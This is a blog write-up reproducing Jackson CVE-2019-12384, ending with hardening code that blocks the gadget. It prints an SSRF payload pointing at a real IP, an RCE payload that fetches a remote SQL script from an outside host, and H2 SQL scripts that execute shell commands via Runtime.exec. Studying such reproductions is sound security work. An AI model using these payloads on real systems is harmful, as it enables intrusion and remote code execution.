Jackson CVE-2019-12384: reproducing the deserialization vulnerability

Uncategorized | Admin | 5 months ago (07-23) | 640 views | 0 comments

Reference: https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

Environment setup

Add the jar dependencies:
SSRF payload:
"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]"
Main method:
import java.io.IOException;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;

public class Test {
    public static void main(String[] args) throws IOException {

        // First array element is the class Jackson will instantiate, the second its
        // properties. DriverManagerConnectionSource exposes getConnection(), which opens
        // a JDBC connection to the supplied url when the bean is serialized.
        String payload = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\","
                + " {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]";
        ObjectMapper mapper = new ObjectMapper();
        // Default typing lets the JSON name arbitrary classes: the root cause of CVE-2019-12384.
        mapper.enableDefaultTyping();
//      mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
        Object obj = mapper.readValue(payload, java.lang.Object.class);
        // Serializing the object invokes the getConnection() getter, which triggers the JDBC call.
        mapper.writeValueAsString(obj);

    }
}


RCE payload:
"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://www.a0xpg.com/inject_win.sql'\"}]";


inject_win.sql:
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"cmd", "/c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('calc')
inject_linux.sql:
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('id > exploited.txt')
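The PoC above works only because enableDefaultTyping() lets the JSON name any class on the classpath. The following is an added example (not from the original post) of the Jackson 2.10+ replacement, activateDefaultTyping() with a PolymorphicTypeValidator, which rejects the same payload before the gadget class is ever resolved; the package prefix com.example.model. is an assumed placeholder for an application's own model classes.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class HardenedMapper {

    // Only classes under our own model package may appear as polymorphic type ids.
    // "com.example.model." is an assumed prefix; use the application's real package.
    static ObjectMapper build() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")
                .build();
        ObjectMapper mapper = new ObjectMapper();
        // Same applicability as the legacy enableDefaultTyping(), but every type id
        // is now checked against the validator before the class is loaded.
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
        return mapper;
    }

    // True when the mapper refuses the type id named in the payload.
    static boolean rejects(ObjectMapper mapper, String payload) {
        try {
            mapper.readValue(payload, Object.class);
            return false;
        } catch (InvalidTypeIdException e) {
            // "Configured PolymorphicTypeValidator ... denied resolution"
            return true;
        } catch (java.io.IOException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        // The SSRF payload from the post; the attacker host is replaced by a placeholder.
        String payload = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\","
                + " {\"url\":\"jdbc:h2:tcp://ATTACKER_HOST:9999/test\"}]";
        System.out.println("payload rejected: " + rejects(build(), payload));
    }
}
```

The denial happens on the class name alone, so the gadget is blocked even when logback and H2 are present on the classpath; leaving default typing disabled entirely remains the stronger option where polymorphic JSON is not needed.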

